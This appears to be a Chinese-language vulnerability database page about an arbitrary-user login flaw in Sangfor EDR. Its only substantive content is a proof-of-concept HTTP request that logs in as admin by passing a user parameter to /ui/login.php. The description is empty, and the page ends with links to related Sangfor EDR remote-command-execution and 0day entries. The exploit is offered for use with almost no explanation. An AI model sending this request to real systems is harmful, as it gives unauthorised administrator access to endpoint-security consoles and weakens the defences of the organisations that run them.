深信服 EDR /ui/login.php 任意用户登录漏洞

漏洞描述

PoC代码

GET /ui/login.php?user=admin HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15

相关漏洞推荐

• 深信服-EDR /api/edr/sanforinter/v2/cssp/slog_client 命令执行漏洞
• 深信服-EDR /api/edr/sanforinter/v2/cssp/slog_client 远程命令执行漏洞
• 深信服-EDR /tool/log/c.php 远程命令执行漏洞
• 深信服 EDR 3.2.21 任意代码执行漏洞
• 深信服EDR process_cssp.php 远程命令执行漏洞
• 深信服EDR登录权限绕过漏洞(0day)
• 深信服EDR未授权远程代码执行漏洞(0day)